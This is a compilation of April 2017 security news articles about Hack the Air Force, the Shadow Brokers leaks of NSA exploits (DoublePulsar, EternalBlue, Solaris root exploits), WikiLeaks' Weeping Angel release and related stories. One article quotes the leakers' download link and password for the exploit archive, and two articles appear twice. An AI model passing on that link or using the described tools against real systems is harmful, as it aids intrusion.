"This is the first time the AF [Air Force] has opened up...networks to such a broad scrutiny," Peter Kim, the Air Force Chief Information Security Officer said in a statement. "We have malicious hackers trying to get into our systems every day."
"It'll be nice to have friendly hackers taking a shot and, most importantly, showing us how to improve our cyber security and defense posture. The additional participation from our partner nations greatly widens the variety of experience available to find additional unique vulnerabilities."
The "Hack the Air Force" program is directed by HackerOne, the bug bounty startup that was behind Hack the Pentagon, and Luta Security, the security consulting company driving the U.K. program.
Hackers From The Five Eyes Nations Are Invited
This program will be the DoD's largest bug bounty project as it invites experts and white hat hackers not only from the United States, but also from remaining Five Eyes countries: the United Kingdom, Canada, Australia and New Zealand.
So, only Hackers and bug hunters from the Five Eyes intelligence alliance are eligible to participate in Hack the Air Force.
"This outside approach – drawing on the talent and expertise of our citizens and partner nation citizens – in identifying our security vulnerabilities will help bolster our cyber security," said Air Force Chief of Staff Gen. David L. Goldfein.
"We already aggressively conduct exercises and 'red team' our public facing and critical websites. But this next step throws open the doors and brings additional talent onto our cyber team."
Only Vetted Hackers Can Participate
Only "Vetted Hackers" can participate in Hack the Air Force program, which means the candidates must pass a rigorous background test after registration and have a clean criminal record in order to participate in the program.
However, according to some critics, this process excludes many talented hackers and bug hunters, but this is one of the common conditions across all of the Pentagon's bug bounty programs.
Registration for "Hack the Air Force" will start on May 15 and interested participants should register through HackerOne. The contest will launch on May 30 and last until June 23.
The first DoD bug bounty program, "Hack the Pentagon," came in April 2016, in which over 14,000 participating hackers found 138 vulnerabilities in DoD systems and were awarded over $75,000 in bounties.
Just like Bug Bounty programs offered by several Frontliners in the technology industry, Hack the Air Force is also an exercise for the federal authorities to boost up their security measures and counter the cyber attacks.


Hack the Air Force bug bounty initiative is going to start
27.4.2017 securityaffairs  BigBrothers

The United States Air Force has launched the ‘Hack the Air Force’ bug bounty program to test the security of its the networks and computer systems.
I have discussed many times the importance and the numerous advantages of a bug bounty program.

Bug bounties are very popular initiatives among the communities of white hats, principal companies, including Facebook, Google, and Microsoft. Facebook, for example, announced to have paid more than $3 million since 2011, when its bug bounty program was launched.

A year ago the Pentagon launched the ‘Hack the Pentagon’ initiative, the first-ever program of its kind, that aims to test the resilience to cyber attacks of the US defenses.

News of the day is that the United States Air Force has announced the ‘Hack the Air Force’ bug bounty program to test the security of its the networks and computer systems.
The initiative was announced yesterday by the US Air Force via a Facebook live stream, the bug bounty initiative is operated by the HackerOne and called ‘Hack the Air Force’.

White-hat hackers are invited to participate the progreamme to find security vulnerabilities affecting systems exposed on the Internet by the US Air Force.

The US Government will pay for any bug discovered under the ‘Hack the Air Force’ initiative.

“We have millions of probes a day, a week, on our DoD systems quite frankly. These are probably people out there, around the world, who particularly aren’t friendly with the Department of Defense. And they generally don’t tell us what’s wrong with our systems until we find out that something’s been hacked. And so I want to turn that around. I want to know beforehand where our vulnerabilities are. I know we have vulnerabilities, and I want to know where those are in the United States Air Force.” said Chief Information Security Officer Peter Kim.

Kim highlighted the importance of an external security assessment of the systems of the US Air Force, it is essential to discover the vulnerabilities before threat actors and bug bounty initiatives are very useful in this sense.

Researchers and white-hat hackers that want to participate in the challenge will need to register on the HackerOne website, then the operators behind the platform will make necessary the checks before granting the access to the programme.

Military members and government civilians are not eligible for compensation, they can anyway participate on-duty with supervisor approval.

Registration for Hack the Air Force is scheduled to begin May 15th and is open to United States, UK, Australian, New Zealand, and Canadian citizens. These states belong to the so-called states belong to the so-called states belong to the so-called Five Eyes intelligence alliance. The Hack the Air Force bug bounty program will run from May 30 to June 23.

Experts believe the US Government and the US Air Force may run other bug bounty initiatives in the future.

At the time I was writing there is no news about the total amount of money reserved for the initiative, the DoD’s Hack the Pentagon initiative paid $75,000 in bounties, the Department of Defense in the past have offered bounty payments of up to $150,000 for hackers who discover security vulnerabilities.


DoD Launches "Hack the Air Force" Bug Bounty Program

27.4.2017 securityweek BigBrothers
Following the success of the “Hack the Pentagon” and “Hack the Army” initiatives, the U.S. Department of Defense announced on Wednesday the launch of the “Hack the Air Force” bug bounty program.

“Hack the Air Force” will be the Pentagon’s largest bug bounty project as it’s open to experts not only from the United States, but also from Five Eyes countries, which includes the United Kingdom, Canada, Australia and New Zealand.

The program, run on the HackerOne platform, aims to help the Air Force strengthen its critical assets. White hat hackers who report vulnerabilities will be eligible for monetary rewards, but the exact amounts have not been specified.

Only vetted researchers can register; military members and government civilians can participate, but they will not earn any rewards.

“This is the first time the AF has opened up our networks to such a broad scrutiny,” said Air Force Chief Information Security Officer Peter Kim. “We have malicious hackers trying to get into our systems every day. It will be nice to have friendly hackers taking a shot and, most importantly, showing us how to improve our cybersecurity and defense posture. The additional participation from our partner nations greatly widens the variety of experience available to find additional unique vulnerabilities.”

Registration for “Hack the Air Force” opens on May 15. The event will take place between May 30 and June 23.

A total of 371 people registered for the previous Hack the Army program. They submitted 416 vulnerability reports, 118 of which were classified as unique and actionable. Participants were awarded roughly $100,000.

Hack the Pentagon received 138 valid submissions and it cost the U.S. government $150,000, half of which went to participants.


Hackers Are Using NSA's DoublePulsar Backdoor in Attacks

24.4.2017 securityweek BigBrothers
A hacking tool allegedly used by the NSA-linked threat actor “Equation Group” that was exposed to the public roughly a week ago has been already observed in live attacks.

Dubbed DoublePulsar, the backdoor was released by the Shadow Brokers hacker group on Friday before the Easter holiday, as part of a password-protected archive containing a larger set of tools and exploits. Last week Microsoft said that the newly revealed exploits don’t affect up-to-date systems.

DoublePulsar is the primary payload in SMB (Server Message Block) and RDP (Remote Desktop Protocol) exploits in the NSA’s FuzzBunch software, an exploitation framework similar to Metasploit, penetration tester zerosum0x0 explains.

This sophisticated, multi-architecture SMB backdoor can hide on a system and avoid alerting built-in defenses. An attacker could infect a system and return to it after a desired period of time to perform more intrusive actions.

MWR InfoSecurity's Countercept group also notes that DoublePulsar appears to be a very stealthy kernel-mode payload, while also revealing that it is dropped by default by many exploits. The backdoor, they say, can be used to inject arbitrary DLLs into user land processes.

Following in-depth analysis, Countercept discovered that the malware would enumerate processes to find the suitable one for injecting the user land DLL and execute code. They also discovered that the payload would wipe memory for evasion, though parts of the code would remain unwiped, it seems.

The firm also decided to build a script to detect the presence of both SMB and RDP versions of the DoublePulsar implant, so as to help people find compromises in their networks. “It re-implements the ping command of the implant, which can be used remotely without authentication, in order to determine if a system is infected or not,” they explain.

On April 18, after using the masscan tool developed by @ErrataRob to find 5,502,460 unique hosts with an open port 445 (SMB port), Below0Day used Countercept’s detection script to detect 30,626 hosts with DoublePulsar SMB implant. On April 21, the same scan revealed 5,190,506 exposed hosts and 56,586 infections, most of which were located in the United States.

This shows that the exploit is actively used in infection campaigns, and the number of compromised hosts appears to be growing fast, most probably as more actors are starting using the implant in their assaults.


Denmark Says Russia Hacked Defense Ministry Emails

24.4.2017 securityweek  BigBrothers
Denmark on Monday denounced Moscow's "aggressive" behavior after a report accused Russian hackers of infiltrating the defense ministry's email accounts.

"This is part of a continuing war from the Russian side in this field, where we are seeing a very aggressive Russia," Defense Minister Claus Hjort Frederiksen told Danish news agency Ritzau.

A report published Sunday by the Centre for Cyber Security accused a group of pro-Kremlin hackers of breaking into the emails of defense ministry employees in 2015 and 2016.

"The hacked emails don't contain military secrets, but it is of course serious," Frederiksen said.

The report identified the hacker group as APT28, also known as Pawn Storm, Sofacy and Fancy Bear, which has links to the Russian government and security services and has previously been named by the FBI and US Homeland Security as being behind "malicious cyber activity" against US government bodies.

The group is also believed to be behind other high-profile cyber attacks.

In Denmark, the Centre for Cyber Security said earlier this year that the threat against Danish authorities and companies remained "very high".


Hackers Are Using NSA's DoublePulsar Backdoor in Attacks

24.4.2017 securityweek BigBrothers
A hacking tool allegedly used by the NSA-linked threat actor “Equation Group” that was exposed to the public roughly a week ago has been already observed in live attacks.

Dubbed DoublePulsar, the backdoor was released by the Shadow Brokers hacker group on Friday before the Easter holiday, as part of a password-protected archive containing a larger set of tools and exploits. Last week Microsoft said that the newly revealed exploits don’t affect up-to-date systems.

DoublePulsar is the primary payload in SMB (Server Message Block) and RDP (Remote Desktop Protocol) exploits in the NSA’s FuzzBunch software, an exploitation framework similar to Metasploit, penetration tester zerosum0x0 explains.

This sophisticated, multi-architecture SMB backdoor can hide on a system and avoid alerting built-in defenses. An attacker could infect a system and return to it after a desired period of time to perform more intrusive actions.

MWR InfoSecurity's Countercept group also notes that DoublePulsar appears to be a very stealthy kernel-mode payload, while also revealing that it is dropped by default by many exploits. The backdoor, they say, can be used to inject arbitrary DLLs into user land processes.

Following in-depth analysis, Countercept discovered that the malware would enumerate processes to find the suitable one for injecting the user land DLL and execute code. They also discovered that the payload would wipe memory for evasion, though parts of the code would remain unwiped, it seems.

The firm also decided to build a script to detect the presence of both SMB and RDP versions of the DoublePulsar implant, so as to help people find compromises in their networks. “It re-implements the ping command of the implant, which can be used remotely without authentication, in order to determine if a system is infected or not,” they explain.

On April 18, after using the masscan tool developed by @ErrataRob to find 5,502,460 unique hosts with an open port 445 (SMB port), Below0Day used Countercept’s detection script to detect 30,626 hosts with DoublePulsar SMB implant. On April 21, the same scan revealed 5,190,506 exposed hosts and 56,586 infections, most of which were located in the United States.

This shows that the exploit is actively used in infection campaigns, and the number of compromised hosts appears to be growing fast, most probably as more actors are starting using the implant in their assaults.


Denmark Says Russia Hacked Defense Ministry Emails

24.4.2017 securityweek  BigBrothers
Denmark on Monday denounced Moscow's "aggressive" behavior after a report accused Russian hackers of infiltrating the defense ministry's email accounts.

"This is part of a continuing war from the Russian side in this field, where we are seeing a very aggressive Russia," Defense Minister Claus Hjort Frederiksen told Danish news agency Ritzau.

A report published Sunday by the Centre for Cyber Security accused a group of pro-Kremlin hackers of breaking into the emails of defense ministry employees in 2015 and 2016.

"The hacked emails don't contain military secrets, but it is of course serious," Frederiksen said.

The report identified the hacker group as APT28, also known as Pawn Storm, Sofacy and Fancy Bear, which has links to the Russian government and security services and has previously been named by the FBI and US Homeland Security as being behind "malicious cyber activity" against US government bodies.

The group is also believed to be behind other high-profile cyber attacks.

In Denmark, the Centre for Cyber Security said earlier this year that the threat against Danish authorities and companies remained "very high".


Hackers compromised thousands of Windows boxes using leaked NSA hack tools DOUBLEPULSAR and ETERNALBLUE
22.4.2017 securityaffairs BigBrothers

Security researcher warn of hackers compromised thousands of Windows boxes using leaked NSA hack tools DOUBLEPULSAR and ETERNALBLUE
Security expert Dan Tentler, the founder of security shop Phobos Group, has observed a significant increase in the number of Windows boxes exposed on the Internet that has been hacked with DOUBLEPULSAR backdoor. The compromised windows boxes have been used for several criminal purposes such as delivering malware or used in spam campaigns.

The DOUBLEPULSAR backdoor allows attackers to inject and execute malicious code on a target system, it is installed by leveraging the ETERNALBLUE, an SMBv1 (Server Message Block 1.0) exploit that could trigger an RCE in older versions of Windows (Windows XP to Server 2008 R2).

Every Window machine running an old vulnerable version that exposes an SMB service is at risk of hack.

The DOUBLEPULSAR and ETERNALBLUE are now available for anyone after the archive of NSA tools was leaked online.

Recently Microsoft patched the SMB Server vulnerability (MS17-010) exploited by ETERNALBLUE, the security updates were released for Windows Vista SP2, Windows 7, Windows 8.1, Windows RT 8.1, Windows 10, Windows Server 2008 SP2, Windows Server 2008 R2 SP1, Windows Server 2012 and Windows Server 2012 R2, Windows Server 2016, and Server Core.

According to Tentler, who scanned the Internet for vulnerable Windows boxes, 15,196 systems have been already compromised, most of them in the US.

The expert also observed that the number of infections continues to increase.

Windows boxes compromised with the DOUBLEPULSAR implant could be easily identified observing the response to a special ping to port 445.

DOUBLEPULSAR hack

“I’m hopeful this is the wakeup moment for people over patching Windows machines.” said Tentler.
According to Tentler on Easter weekend, script kiddies worldwide launched a massive attack leveraging the DOUBLEPULSAR exploit.

The experts have no doubt, the number of DOUBLEPULSAR attacks could continue to increase in the coming week.


Leaked NSA Hacking Tools Being Used to Hack Thousands of Vulnerable Windows PCs

22.4.2017 thehackernews  BigBrothers

Script kiddies and online criminals around the world have reportedly started exploiting NSA hacking tools leaked last weekend to compromise hundreds of thousands of vulnerable Windows computers exposed on the Internet.
Last week, the mysterious hacking group known as Shadow Brokers leaked a set of Windows hacking tools targeting Windows XP, Windows Server 2003, Windows 7 and 8, and Windows 2012, allegedly belonged to the NSA's Equation Group.
What's Worse? Microsoft quickly downplayed the security risks by releasing patches for all exploited vulnerabilities, but there are still risks in the wild with unsupported systems as well as with those who haven't yet installed the patches.
Multiple security researchers have performed mass Internet scans over the past few days and found tens of thousands of Windows computers worldwide infected with DoublePulsar, a suspected NSA spying implant, as a result of a free tool released on GitHub for anyone to use.
Security researchers from Switzerland-based security firm Binary Edge performed an Internet scan and detected more than 107,000 Windows computers infected with DoublePulsar.
A separate scan done by Errata Security CEO Rob Graham detected roughly 41,000 infected machines, while another by researchers from Below0day detected more than 30,000 infected machines, a majority of which were located in the United States.
The impact? DoublePulsar is a backdoor used to inject and run malicious code on already infected systems, and is installed using the EternalBlue exploit that targets SMB file-sharing services on Microsoft's Windows XP to Server 2008 R2.
Therefore, to compromise a machine, it must be running a vulnerable version of Windows OS with an SMB service expose to the attacker.
Both DoublePulsar and EternalBlue are suspected as Equation Group tools and are now available for any script kiddie to download and use against vulnerable computers.
Once installed, DoublePulsar used hijacked computers to sling malware, spam online users, and launch further cyber attacks on other victims. To remain stealthy, the backdoor doesn't write any files to the PCs it infects, preventing it from persisting after an infected PC is rebooted.
While Microsoft has already patched majority of the exploited flaws in affected Windows operating systems, those who have not patched are vulnerable to exploits such as EternalBlue, EternalChampion, EternalSynergy, EternalRomance, EmeraldThread, and EducatedScholar.
Moreover, systems that are still using end-of-life platforms like Windows XP, Windows Server 2003, and IIS 6.0, which no longer received security updates, are also vulnerable to the in-the-wild exploits.
Since it takes hackers roughly a few hours to download the Shadow Brokers dump, scan the Internet with the tool released on Monday, and deliver hacking exploits, researchers are expecting more vulnerable and unpatched computers to fall victims to DoublePulsar.
After this news had broken, Microsoft officials released a statement saying: "We doubt the accuracy of the reports and are investigating."
Meanwhile, Windows users who haven't applied MS17-010 by now are strongly advised to download and deploy the patches as soon as possible.


WikiLeaks Details Samsung Smart TV Hacking Tool

22.4.2017 securityweek BigBrothers
WikiLeaks has released a document detailing yet another hacking tool allegedly used by the U.S. Central Intelligence Agency (CIA). This time, the organization has published information on a tool designed to record audio via the built-in microphone of some Samsung smart TVs.

The tool, dubbed “Weeping Angel,” is apparently based on “Extending,” an implant allegedly developed by British security service MI5 – the agencies are said to have worked together on this project.

Some information on Weeping Angel was made public by WikiLeaks as part of the first Vault 7 dump, and the organization has now decided to also release a user guide.

The newly released guide, dated February 2014, describes an implant for Samsung F series smart TVs. The implant can record audio from a device via the built-in microphone and either store or exfiltrate the recordings.

The Weeping Angel implant can be installed by connecting a USB device to the targeted TV, and data can be exfiltrated either via a USB stick or a compromised Wi-Fi hotspot. However, previously leaked documents showed that its developers had been planning to add more data theft capabilities, including for browser data and Wi-Fi credentials, and even exploiting available remote access features.

SecurityWeek has reached out to Samsung for comment and will update this article if the company responds.

Last week, WikiLeaks released six documents describing a project named HIVE, which the CIA allegedly used to exfiltrate information from compromised machines and send commands to the malware found on these devices.

The whistleblower organization has also detailed hacking tools targeting security products, a framework used to make attribution and analysis of malware more difficult, and a platform designed for creating custom malware installers.

While WikiLeaks has offered to share the exploits it possesses with affected tech companies, most firms don’t seem willing to comply with WikiLeaks’ conditions for obtaining the files. Furthermore, an analysis of the available information showed that many of the vulnerabilities have already been patched.

U.S. authorities have neither confirmed nor denied the authenticity of the Vault 7 files, but reports say both the CIA and the FBI are hunting for an insider who may have provided the information to WikiLeaks.

Researchers at Symantec and Kaspersky have found links between the leaked Vault 7 files and the tools used by a cyber espionage group tracked by the security firms as Longhorn and The Lamberts, respectively.


Arrest of WikiLeaks's Assange a 'Priority': US Top Cop

21.4.2017 securityweek BigBrothers
The arrest of WikiLeaks founder Julian Assange is a US "priority," Attorney General Jeff Sessions said Thursday, as media reports indicated his office was preparing charges against the fugitive anti-hero.

"We are going to step up our effort and already are stepping up our efforts on all leaks," Sessions, America's top cop, said at a news conference in response to a reporter's question about a US priority to arrest Assange.

The Justice Department chief said a rash of leaks of sensitive secrets appeared unprecedented.

"This is a matter that's gone beyond anything I'm aware of. We have professionals that have been in the security business of the United States for many years that are shocked by the number of leaks and some of them are quite serious," he said.

"Whenever a case can be made, we will seek to put some people in jail."

Prosecutors in recent weeks have been drafting a memo that looks at charges against Assange and members of WikiLeaks that possibly include conspiracy, theft of government property and violations of the Espionage Act, the Washington Post reported, citing unnamed US officials familiar with the matter.

Several other media outlets also cited unnamed officials as saying US authorities were preparing charges against Assange. The Justice Department declined to comment on the reports.

Assange, 45, has been holed up at the Ecuadoran embassy in London since 2012 trying to avoid extradition to Sweden where he faces a rape allegation that he denies.

He fears Sweden would extradite him to the United States to face trial for leaking hundreds of thousands of secret US military and diplomatic documents that first gained attention in 2010.

Assange's case returned to the spotlight after WikiLeaks was accused of meddling in the US election last year by releasing a damaging trove of hacked emails from presidential candidate Hillary Clinton's campaign and the Democratic party.

US officials say the emails were hacked with the aid of the Russian government in its bid to influence the US election.

Critics say their release late in the race helped to tip the November 8 election to Republican Donald Trump.

Trump and his administration have put heat on WikiLeaks after it embarrassed the Central Intelligence Agency last month by releasing a large number of files and computer code from the spy agency's top-secret hacking operations.

The documents showed how the CIA exploits vulnerabilities in popular computer and networking hardware and software to gather intelligence.

Supporters of WikiLeaks say it's practicing the constitutional right of freedom of speech and the press.

- 'Hostile intelligence service'-

CIA Director Mike Pompeo last week branded WikiLeaks a "hostile intelligence service," saying it threatens democratic nations and joins hands with dictators.

Pompeo focused on the anti-secrecy group and other leakers of classified information like Edward Snowden as one of the key threats facing the United States.

"WikiLeaks walks like a hostile intelligence service and talks like a hostile intelligence service. It has encouraged its followers to find jobs at CIA in order to obtain intelligence... And it overwhelmingly focuses on the United States, while seeking support from anti-democratic countries and organizations," said Pompeo.

"It is time to call out WikiLeaks for what it really is -- a non-state hostile intelligence service often abetted by state actors like Russia."

The day before Pompeo spoke, Assange published an opinion piece in The Washington Post in which he said his group's mission was the same as America's most respected newspapers: "to publish newsworthy content."

"WikiLeaks's sole interest is expressing constitutionally protected truths," he said, professing "overwhelming admiration for both America and the idea of America."


The alleged link between the Shadow Brokers data leak and the Stuxnet cyber weapon
18.4.2017 securityaffairs BigBrothers

Security researchers who analyzed the documents and hacking tools included in the last Shadow Brokers dump found a link to the Stuxnet virus.
On Friday, the Shadow Brokers leaked a new bunch of files belonging to the alleged NSA arsenal.

Security researchers who analyzed the documents and hacking tools included in the last dump have discovered many exploits specifically designed to compromise Windows systems.

Digging the archive, experts spotted a surprising exploit that was used in the Stuxnet cyber weapon, the malware used to destroy the Iranian nuclear programme in the Natanz plant.

According to Symantec researcher Liam O’Murchu, the exploit was developed for Windows’ MOF files and it is “almost the exact same script” used in Stuxnet.

“There is a strong connection between Stuxnet and the Shadow Brokers dump,” O’Murchu told Motherboard in an email. “But not enough to definitively prove a connection.”
Let’s see the similarities between the Stuxnet code and the exploit code in the last dump leaked by Shadow Brokers.

Below a portion of the script from Stuxnet.

Stuxnet code vs Shadow Brokers exploit
and this is a portion of the script dumped by The Shadow Brokers.


Of course, who has developed the tool included in the Shadow Brokers dump may have borrowed the script from the public knowledge of Stuxnet. The same code, for example, was included in the Metasploit framework allowing anyone to create a MOF file like the one exploited in Stuxnet attack.

O’Murchu highlighted that the MOF file creation tool in the Shadow Brokers dump presented a last compiled date set on September 9, 2010, a few months Stuxnet discovery, but “shortly before the code was added to Metasploit.”

The researcher Kevin Beaumont believe that there is link between Stuxnet and the exploit shared by Shadow Brokers.

Follow
Kevin Beaumont ✔ @GossiTheDog
lol I think this one I just found is one of the exploits used in Stuxnet, even notes patch num
2:48 PM - 14 Apr 2017
3 3 Retweets 10 10 likes
Lorenzo Franceschi-Bicchierai from Motherboard also reported that the Avast Antivirus detects some exploits in the Shadow Brokers dump as Stuxnet.

It is very curious, even in the case of false positive that the signatures of the exploits match the Stuxnet’s one.

Are we facing with the evidence that the NSA-linked Equation Group was involved in the Stuxnet attack, or is this a well organized false-flag operation?
“Therefore, the Stuxnet MOF file creation tool that the Shadow Brokers dropped on Friday is possibly the earliest technical evidence that NSA hackers and developers coded Stuxnet, as many suspect.” added Bicchierai.


Microsoft biannual transparency report – US foreign intelligence surveillance requests more than doubled
17.4.2017 securityaffairs BigBrothers

Microsoft published the biannual transparency report – The number of US foreign intelligence surveillance requests more than doubled.
Microsoft shared data included in the biannual transparency report, the IT giant received more than double what the company said it received under the Foreign Intelligence Surveillance Act (FISA) during the preceding six months.

Microsoft Corp announced it had received in the first half of 2016 at least a thousand surveillance requests from the US Government that sought user content for foreign intelligence purposes.

This is the highest number of request Microsoft has listed since 2011, when it began tracking such government surveillance orders.

Privacy advocates in Congress are concerned about such increase and call for reforms to any FISA legislation in order to limit US Government from searching of American data that is incidentally collected during foreign surveillance operations.

FISA orders have to be approved by judges at the Foreign Intelligence Surveillance Court and they are usually kept secret.

“Microsoft said it received between 1,000 and 1,499 FISA orders for user content between January and June of 2016, compared to between 0 and 499 during both January-June 2015 as well as the second half of 2015.” reported the Reuters.

The Microsoft biannual transparency reports consists of the Law Enforcement Requests Report, U.S. National Security Orders Report and Content Removal Requests Report.

“Microsoft received 1,000-1,499 FISA orders seeking content disclosures affecting 12,000-12,499 accounts, compared to the 0-499 FISA orders seeking disclosure of content impacting 17,500-17,999 accounts reported for the previous period.” states Microsoft. “We received 0-499 National Security Letters in the latest reporting period, which remains unchanged from the previous period.”

Microsoft biannual transparency report

A portion of the FISA will expire at the end of the year unless lawmakers vote to reauthorize it.

Microsoft also released for the first time a national security letter (NSL), a sort of warrantless surveillance order used by the FBI to access data of a customer of the company.

“As part of the release of these reports, we are also disclosing a National Security Letter (NSL) we received from the Federal Bureau of Investigation (FBI) in 2014, which sought data belonging to a customer of our consumer services.” states Microsoft,

Microsoft isn’t the unique company that disclosed an NSL, Twitter and Yahoo in the recent months made the same under a transparency measure of the USA Freedom Act.


Hacked Files Suggest NSA Penetrated SWIFT, Mideast Banks

16.4.2017 securityweek BigBrothers
Files released by the mysterious hacker Shadow Brokers suggested Friday the US National Security Agency had penetrated the SWIFT banking network and monitored a number of Middle East banks.

The files, according to computer security analysts, also showed the NSA had found and exploited numerous vulnerabilities in a range of Microsoft Windows products widely used on computers around the world.

Analysts generally accepted the files, which show someone exploiting so-called "zero-day" or hitherto unknown vulnerabilities in common software and hardware, came from the NSA.

They are believed stolen from a hyper-secret hacking unit dubbed the "Equation Group" at the key US signals intelligence agency.

"The tools and exploits released today have been specifically designed to target earlier versions of Windows operating system," said security specialist Pierluigi Paganini on the Security Affairs website.

They "suggest the NSA was targeting the SWIFT banking system of several banks around the world."

The files appear to indicate that the NSA had infiltrated two of SWIFT's service bureaus, including EastNets, which provides technology services in the Middle East for the Belgium-based SWIFT and for individual financial institutions.

Via that entry point the agency appears to have monitored transactions involving several banks and financial institutions in Kuwait, Dubai, Bahrain, Jordan, Yemen and Qatar.

In a statement on its website EastNets rejected the allegations.

"The reports of an alleged hacker-compromised EastNets Service Bureau network is totally false and unfounded," it said.

"We can confirm that no EastNets customer data has been compromised in any way."

SWIFT said in a statement that the allegations involve only its service bureaus and not its own network.

"There is no impact on SWIFT's infrastructure or data, however we understand that communications between these service bureaus and their customers may previously have been accessed by unauthorized third parties."

"We have no evidence to suggest that there has ever been any unauthorized access to our network or messaging services."

Shadow Brokers first surfaced last year offering for sale a suite of hacking tools from the NSA. There were no takers at the price stated of tens of millions of dollars, and since then the hacker or hackers have leaked bits of the trove for free.

Analysts say many of the exploits revealed appear to be three years old or more, but have some unknown vulnerabilities that could still be used by other hackers.

No one has yet discovered the identity of Shadow Brokers, or of the hackers that gained access to the NSA materials.


Shadows Brokers released another archive that suggests NSA compromised a SWIFT system
15.4.2017 securityaffairs BigBrothers

The Shadow Brokers group released a 117.9 MB encrypted dump containing documents that suggest NSA hacker SWIFT system in the Middle East.
Last week, the notorious Shadow Brokers hackers group that claimed to have stolen the hacking tools and exploits from the NSA has leaked the password for an encrypted cache of Unix hacking tools and exploits, including a remote root zero-day exploit for Solaris OS and the TOAST framework.
Today the Shadow Brokers group has released another piece of the precious archive alleged stolen to the NSA, a 117.9 MB encrypted dump, it includes three folders named Windows, Swift, and OddJob including 23 new hacking tools.

Some of the codenames for the hacking tools in the archive are OddJob, EasyBee, EternalRomance, FuzzBunch, EducatedScholar, EskimoRoll, EclipsedWing, EsteemAudit, EnglishMansDentist, MofConfig, ErraticGopher, EmphasisMine, EmeraldThread, EternalSynergy, EwokFrenzy, ZippyBeer, ExplodingCan, DoublePulsar.

The tools and exploits released today have been specifically designed to target earlier versions of Windows operating system, this last bunch of documents suggests the NSA was targeting the SWIFT banking system of several banks around the world.

The hackers published a blog post titled “Lost in Translation,” which included a link to the archive and the password.

“Follow the links for new dumps. Windows. Swift. Oddjob. Oh you thought that was it? Some of you peoples is needing reading comprehension.

https://yadi.sk/d/NJqzpqo_3GxZA4
Password = Reeeeeeeeeeeeeee
” reads the blog post.

The overall archive was now available on GitHub, including the last portion.
Of course, security researchers immediately started digging the precious trove of files.

Follow
x0rz @x0rz
Windows exploits, payloads and implants of #EquationGroup dumped by the #ShadowBrokers: confirmed.
11:44 AM - 14 Apr 2017
239 239 Retweets 206 206 likes
Follow
Hacker Fantastic @hackerfantastic
EMERALDTHREAD is an exploit (unpatched?) for Windows XP to Windows 2003 SP2.
3:04 PM - 14 Apr 2017
8 8 Retweets 7 7 likes
The hacking tools in the Windows folder work against older versions of Windows (Windows XP) and Server 2003.

The folder OddJob contains a Windows implant and includes alleged configuration files and payloads, also in this case targeted versions are older ones like Windows Server 2003 Enterprise up to Windows XP Professional.

According to the Security expert Kevin Beaumont, who analyzed the dump, some of the Windows exploits were able to avoid detection.
Segui
Kevin Beaumont ✔ @GossiTheDog
So far the first 3 exploits in Windows/Exploits haven't been on VirusTotal before, nor in Palo-Alto Autofocus.
12:45 - 14 Apr 2017
5 5 Retweet 9 9 Mi piace
But the SWIFT folder contains a PowerPoint document that could reveal a disconcerting reality. The PPT contains credentials and data on the internal architecture of EastNets, one of the largest SWIFT Service Bureau in the Middle East.
NSA hacked SWIFT
The folder includes SQL scripts that could be used to query Oracle Database to obtain a wide range of information, including the list of users and the SWIFT message queries.
NSA hacked SWIFT

The folder also contains Excel files that demonstrate the NSA’s linked Equation Group had hacked many banks worldwide, most of them in countries in the Middle East (i.e.UAE, Kuwait, Qatar, Palestine, and Yemen).

Segui
Matt Suiche ✔ @msuiche
SWIFT Host of Palestinian Bank was running Windows 2008 R2 vulnerable to exploit framework FUZZBUNCH. #ShadowBrokers cc @hackerfantastic
17:48 - 14 Apr 2017
41 41 Retweet 32 32 Mi piace
But EastNets’ CEO has denied NSA hackers ever compromised the systems of the company.
“The reports of an alleged hacker-compromised EastNets Service Bureau (ENSB) network is totally false and unfounded,” EastNets’ CEO Hazem Mulhim told Motherboard in an email. “The EastNets Network internal Security Unit has ran a complete check of its servers and found no hacker compromise or any vulnerabilities.” reads the official statement issued by the company.
“The EastNets Service Bureau runs on a separate secure network that cannot be accessed over the public networks. The photos shown on twitter, claiming compromised information, is about pages that are outdated and obsolete, generated on a low-level internal server that is retired since 2013.”

“While we cannot ascertain the information that has been published, we can confirm that no EastNets customer data has been compromised in any way”


Watch out! Shadow Brokers dump includes remote root exploits for Solaris boxes
12.4.2017 securityaffairs BigBrothers

The security expert Matthew Hickey has discovered two tools dubbed EXTREMEPARR and EBBISLAND which were specifically designed to target Solaris systems.
After the mysterious Shadow Brokers group has leaked the archive containing the stolen NSA hacking tools and exploits, security experts started analyzing the huge trove of data. Experts discovered that NSA operators developed an attack code to compromise Oracle’s Solaris.

The cyber security expert Matthew Hickey, the cofounder of British security shop Hacker House, digging the archive has discovered two tools dubbed EXTREMEPARR and EBBISLAND which were specifically designed to target Solaris systems.


Hacker Fantastic @hackerfantastic
EXTREMEPARR - 0day local privilege escalation attack working on Solaris 7,8,9,10 x86 & SPARC (confirmed & tested, platforms & versions.)
9:31 PM - 10 Apr 2017
87 87 Retweets 97 97 likes

Hacker Fantastic @hackerfantastic
CONFIRMED #0day EBBISLAND (EBBSHAVE) is a root RCE via RPC XDR overflow in Solaris 6, 7, 8, 9 & 10 (possibly newer) both SPARC and x86. pwn
12:00 AM - 11 Apr 2017
91 91 Retweets 102 102 likes
Both tools could be used by a logged-in user to escalate privileges to root, and obtain root access remotely over the network. The tools work on Solaris systems running versions 6 to 10 on x86 and Sparc, and experts believe it could work also on the latest build, version 11.

The EXTREMEPARR tool elevates the logged-in entity (i.g. a user, a script) to root by abusing dtappgather, file permissions, and the setuid binary at.

The EBBISLAND tool could be used to target any open RPC service to spawn a remote root shell on the flawed Solaris box. The EBBISLAND triggers a buffer overflow vulnerability in Solaris’s XDR code.

Solaris Exploit

Summarizing the NSA could open a root shell on any Solaris system, the experts noticed that the use of the exploits doesn’t request specific skills.

“These are prebuilt static binaries and you can run them out of the box with very little technical knowledge,” Hickey told The Register.

Follow
Hacker Fantastic @hackerfantastic
The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.
12:23 AM - 11 Apr 2017
68 68 Retweets 54 54 likes
Hickey scanned the Internet searching for vulnerable connected devices, he used the popular Shodan.io search engine, and found thousands of vulnerable systems. But the real threat, he said, was that a lot more of these machines are going to be running internally behind firewalls, and the exploit code could be used to root these once an attacker gets a foothold within an organization.
Many of the flawed machines identified by the expert run internally behind firewalls, this means that the above exploit code could be used by attackers to compromise the target network and move laterally.


G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE
12.4.2017 securityaffairs BigBrothers

